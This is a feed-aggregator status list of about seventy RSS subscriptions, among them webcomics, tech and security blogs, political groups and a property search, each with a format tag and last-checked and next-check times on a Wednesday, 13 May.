https://www.freedompress.org.uk:443/news/feed/ XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
https://www.goblinscomic.com/category/comics/feed/ XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
https://www.loomio.com/blog/feed/ XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
https://www.newstatesman.com/feeds/blogs/laurie-penny.rss XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
https://www.patreon.com/graveyardgreg/posts/comic.rss XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
https://www.rightmove.co.uk/rss/property-for-sale/find.html?locationIdentifier=REGION^876&maxPrice=240000&minBedrooms=2&displayPropertyType=houses&oldDisplayPropertyType=houses&primaryDisplayPropertyType=houses&oldPrimaryDisplayPropertyType=houses&numberOfPropertiesPerPage=24 XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
https://x.com/statuses/user_timeline/22724360.rss XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
Humble Bundle Blog XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
I, Cringely XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Irregular Webcomic! XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
Joel on Software XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
Judith Proctor's Journal XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
Krebs on Security XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
Lambda the Ultimate - Programming Languages Weblog XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
Looking For Group XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
LWN.net XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
Mimi and Eunice XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Neil Gaiman's Journal XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
Nina Paley XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
O Abnormal – Scifi/Fantasy Artist XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Oglaf! -- Comics. Often dirty. XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Oh Joy Sex Toy XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
Order of the Stick XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
Original Fiction Archives - Reactor XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
OSnews XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Paul Graham: Unofficial RSS Feed XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Penny Arcade XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Penny Red XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
PHD Comics XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Phil's blog XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Planet Debian XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Planet GNU XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
Planet Lisp XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Pluralistic: Daily links from Cory Doctorow XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
PS238 by Aaron Williams XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
QC RSS XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
Radar XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
RevK®'s ramblings XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
Richard Stallman's Political Notes XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Scenes From A Multiverse XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
Schneier on Security XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
SCHNEWS.ORG.UK XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
Scripting News XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Seth's Blog XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
Skin Horse XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Tales From the Riverbank XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
The Adventures of Dr. McNinja XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
The Bumpycat sat on the mat XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
The Daily WTF XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
The Monochrome Mob XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
The Non-Adventures of Wonderella XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
The Old New Thing XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
The Open Source Grid Engine Blog XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
The Stranger XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
towerhamletsalarm XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
Twokinds XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
UK Indymedia Features XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Uploads from ne11y XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
Uploads from piasladic XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
Use Sword on Monster XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
Wayward Sons: Legends - Sci-Fi Full Page Webcomic - Updates Daily XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
what if? XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
Whatever XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Whitechapel Anarchist Group XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
WIL WHEATON dot NET XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
wish XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Writing the Bright Fantastic XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
xkcd.com XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May